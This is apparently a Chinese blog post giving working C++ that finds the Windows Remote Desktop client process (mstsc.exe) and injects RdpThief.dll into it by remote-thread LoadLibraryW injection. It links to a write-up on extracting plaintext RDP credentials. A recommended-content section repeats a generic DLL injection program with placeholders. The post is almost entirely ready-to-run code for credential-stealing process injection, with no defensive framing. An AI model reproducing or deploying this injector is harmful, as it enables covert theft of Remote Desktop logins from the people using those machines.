dll注入 c++

进程名搜索pid,然后向对应pid进程注入dll

// detourstest.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"
#include <detours.h>
#include <string.h>
#include <tlhelp32.h>
#pragma comment (lib,"detours.lib")

#define ArraySize(ptr)    (sizeof(ptr) / sizeof(ptr[0]))
/*
static int(WINAPI *TrueMessageBox)(HWND, LPCTSTR, LPCTSTR, UINT) = MessageBox;
int WINAPI OurMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
	return TrueMessageBox(NULL, L"Hooked", lpCaption, 0);
}
int main()
{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourAttach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
	MessageBox(NULL, L"Hello", L"Hello", 0);
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
}
*/


BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid);


int main()
{
	LPCWSTR Name = L"mstsc.exe";
	// StopMyService();
	DWORD dwPid = 0;
	HANDLE ProcessHandle;
	PVOID RemoteBuffer;
	wchar_t DllPath[] = TEXT("C:\\RdpThief.dll");




	if (FindProcessPid(Name, dwPid))
	{
		//printf("[%ls] [%d]\n",Name, dwPid);
		ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
		RemoteBuffer = VirtualAllocEx(ProcessHandle, NULL, sizeof DllPath, MEM_COMMIT, PAGE_READWRITE);
		WriteProcessMemory(ProcessHandle, RemoteBuffer, (LPVOID)DllPath, sizeof DllPath, NULL);
		PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
		CreateRemoteThread(ProcessHandle, NULL, 0, threatStartRoutineAddress, RemoteBuffer, 0, NULL);
		CloseHandle(ProcessHandle);

	}
	else
	{
		printf("[%ls] [Not Found]\n", Name);
	}
	
	return 0;
}

BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid)
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;

	// Take a snapshot of all processes in the system.
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		return(FALSE);
	}

	pe32.dwSize = sizeof(PROCESSENTRY32);

	if (!Process32First(hProcessSnap, &pe32))
	{
		CloseHandle(hProcessSnap);          // clean the snapshot object
		return(FALSE);
	}

	BOOL    bRet = FALSE;
	do
	{
		if (!lstrcmp(ProcessName, pe32.szExeFile))
		{
			dwPid = pe32.th32ProcessID;
			bRet = TRUE;
			break;
		}

	} while (Process32Next(hProcessSnap, &pe32));

	CloseHandle(hProcessSnap);
	return bRet;
}

https://www.c0bra.xyz/2019/12/24/mstsc%E4%B8%AD%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE-RdpThief%E5%AE%9E%E8%B7%B5/

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
以下是C语言代码实现DLL注入: ```c #include <Windows.h> #include <TlHelp32.h> #include <iostream> using namespace std; DWORD GetProcessID(LPCTSTR processName) { PROCESSENTRY32 pe32; HANDLE hProcessSnap; DWORD dwProcessId = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) { cout << "CreateToolhelp32Snapshot failed.\n"; return 0; } pe32.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hProcessSnap, &pe32)) { cout << "Process32First failed.\n"; CloseHandle(hProcessSnap); return 0; } do { if (_tcscmp(pe32.szExeFile, processName) == 0) { dwProcessId = pe32.th32ProcessID; break; } } while (Process32Next(hProcessSnap, &pe32)); CloseHandle(hProcessSnap); if (dwProcessId == 0) { cout << "Cannot find the process: " << processName << endl; } return dwProcessId; } int main(int argc, char* argv[]) { TCHAR dllPath[MAX_PATH] = TEXT("DLL_PATH"); // DLL文件路径 LPCTSTR processName = TEXT("PROCESS_NAME"); // 目标进程名称 DWORD dwProcessId = GetProcessID(processName); if (dwProcessId != 0) { HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId); if (hProcess == NULL) { cout << "OpenProcess failed.\n"; return 1; } LPVOID pRemoteBuf = VirtualAllocEx(hProcess, NULL, MAX_PATH, MEM_COMMIT, PAGE_READWRITE); if (pRemoteBuf == NULL) { cout << "VirtualAllocEx failed.\n"; CloseHandle(hProcess); return 1; } if (!WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)dllPath, MAX_PATH, NULL)) { cout << "WriteProcessMemory failed.\n"; VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE); CloseHandle(hProcess); return 1; } LPTHREAD_START_ROUTINE pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryW"); HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL); if (hThread == NULL) { cout << "CreateRemoteThread failed.\n"; VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE); CloseHandle(hProcess); return 1; } WaitForSingleObject(hThread, INFINITE); VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE); CloseHandle(hThread); CloseHandle(hProcess); } return 0; } ``` 代码中需要填写DLL文件路径和目标进程名称,然后通过调用GetProcessID函数获取指定进程的进程ID,最后将DLL路径写入目标进程并在其中注入代码。需要注意的是,在64位系统下编译和运行时需要开启x64平台支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值